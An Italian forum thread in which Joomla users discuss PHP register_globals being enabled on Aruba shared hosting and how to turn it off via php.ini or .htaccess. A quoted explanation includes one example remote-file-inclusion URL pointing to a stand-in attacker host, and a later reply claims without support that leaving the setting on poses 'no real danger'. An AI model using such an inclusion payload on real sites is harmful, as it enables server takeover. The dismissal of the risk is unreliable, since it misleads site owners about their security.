• User

    Register globals

    Salve ragazzi magari questa discussione l'avete già affrontata ma non riesco a trovare la funzione di cerca nel forum quindi apro un post nuovo di zecca.....

    Ho acquistato su Aruba un hosting linux per installare Joomla ma quando entro nell'amministratore del portale mi segnala la seguente mancanza:

                         Impostazione PHP register_globals è `ON` invece di `OFF`
    

    Se non sbaglio per settare il tutto in maniera ottimale si dovrebbe contattare chi ci fornisce l'hosting ma non vorrei sbagliarmi........
    Qualcuno sa indicarmi come fare ed in caso dirmi cosa succederebbe lasciando cmq questa funzione scoperta???

    P.S. Ho provato ad installare una galleria immagini che mi da problemi solo su questo sito e credo dipenda da questo ma attendo vostre delucidazioni!!


  • Super User

    Dal forge di joomla:

    Register Globals
    Cosa fa?
    La funzione register_globals aiuta gli sviluppatori nella creazione di componenti. Essa infatti permette a tutti i valori che sono processati dallo script e li mette in variabili. Significa che
    index.php?foo=bar
    crea automaticamente la variabile $foo con il valore bar nello script index.php
    Perchè è un rischio? Principalmente perchè la funzione non controlla il valore. Così se vuoi sovrascrivere il path di Joomla usato per includere files, lo permette
    index.php?mos_config_livesite=http://bad.hacker.tld
    Ora l'index.php proverà ad includere questo file e caricherà un file dal server. Con questo script, l'intruso avrà accesso al tuo server.
    La funzione da sola non è un problema. Se controlli ogni variabile prima di usarne il contenuto, sei praticamente al sicuro, e ti aiuta (se sei uno sviluppatore). In Joomla questo è semplice. Per gli sviluppatori c'è una funzione chiamata mosGetParam(), che compie tutti i controlli per te ed è veramente semplice da usare. Se tutti gli sviluppatori usano questa funzione e non il register_globals, abbiamo veramente pochi problemi di sicurezza
    Come posso mettere il register_globals Off?
    Configurazione di Apache/Php
    Se hai accesso al file di configurazione del tuo server puoi scrivere
    register_globals = Off
    Devi avere un po di esperienza, o rischi che il server non risponda più
    file .htaccess
    In molti server, puoi configurare apache tramite i file .htaccess Questi file non possono essere letti dal web!
    Per creare questo file puoi creare un documento con blocco note o linux (non Word !) e inserire la linea
    php_flag register_globals off
    Se lo salvi nella cartella del tuo Joomla, metterai il tuo register_globals a off eliminando i rischi per la sicurezza
    php.ini
    Quando il file .htaccess non è accessibile, puoi usare il file php.ini
    La linea da inseirire o modificare è la seguente
    register_globals = off
    Una soluzione potrebbe essere quella di creare un file php.ini da mettere in tutte le cartelle o modificare il file php.ini del server.
    Se non hai accesso al php.ini devi richiedere al tuo provider di hosting se può metterti il register_globals a off.
    Se si rifiuta, è consigliabile cambiare hosting, in quanto si tratta di una forma di sicurezza basilare utilizzata da molti anni


  • User

    grazie mille sei stato esaustivo come sempre ed ora tutto mi è più chiaro, il mio Host è presso aruba secondo voi va bene per Joomla o mi consigliate qualcosa di diverso????
    Grazie ancora per l'aiuto!!


  • Super User

    Non è il massimo, ma i siti in joomla ci girano...
    certo, poi dipende da che sito devi metterci...


  • User

    Allora in realtà sono 2 i siti che devo costruire......
    Il primo è un semplice sito vetrina e quindi su quello non ho grossi problemi mentre il secondo è un negozio online ed ho paura che questa cosa possa darmi dei grattacapi in caso sapreste indicarmi un hosting sicuro!?!??
    Grazie mille!:vai::vai:


  • Super User

    Per il primo, come hai già capito da solo, puoi tranquillamente sfruttare il vantaggio economico di aruba. 😉

    Per il secondo, cercherei qualcosa di più professionale, ma non me la sento di fare nomi, in quanto, può capitare che alcuni utenti si trovino bene e altri no.
    😉


  • User Newbie

    Ciao a tutti,
    Intervengo nella discussione perché ho lo stesso problema: aruba mi ha risposto che non essendo su un server dedicato non posso andare a modificare il valore di Register Globals.
    Quindi mi sono posto queste domande:
    Tutti gli hosting condivisi hanno questo problema?
    Se non sono uno sviluppatore e uso solamente estensioni ufficiali o quantomeno ritenute molto affidabili, corro comunque qualche rischio?
    Qual'è il rischio effettivo di vedersi defacciato il sito se lascio Register Globals su ON?
    Grazie!


  • Super User

    ciao bizio e benvenuto nel Forum GT 😉

    Ormai la maggior parte dei provider lo imposta già di default, purtroppo aruba ancora no 😉


  • User Newbie

    Ti ringrazio per aver risposto.
    Il sito su cui ho installato joomla è aziendale, il passaggio su aruba è stato effettuato da qualche giorno. 30 euro non sono tanti, ma se dovessi rieffettuare un nuovo passaggio credo che qui non la prenderebbero troppo bene o_O 🙂 ...quanto rischio concretamente a lasciarlo su aruba? in altre parole: è così facile con Register Globals ON danneggiare un sito web?

    P.s.: non è che mi consiglieresti un buon provider per joomla, magari in MP?
    Grazie!


  • User Attivo

    Pochi provider lo hanno disabilitato di default ma ti danno comunque la possibilità di avere files php.ini che ti permettano di modificare il settaggio di register globals.


  • User Newbie

    ma quindi concretamente il mio rischio è alto oppure è solo un po' più alto della media? Perché se è veramente alto cambio mnt subito...
    Oltre al provider pubblicizzato da joomla.it, quali sono quelli che permettono il settaggio di register globals?


  • User Attivo

    Non hai reali pericoli, l'80% per cento dei siti Joomla ha register globals abilitato secondo me.

    Se vuoi un buon hosting, servizio completo e ottima assistenza (lo uso anch'io) prova hostagator.com
    C'è anche la possibilità di disabilitare register globals.

    Nel htaccess con loro puoi mettere:

    php_flag register_globals off
    php_flag mysql.allow_persistent off
    php_value max_execution_time 300
    php_value memory_limit 8M
    php_value post_max_size 20M
    php_value upload_max_filesize 20M
    oltre al resto, rewrite ecc.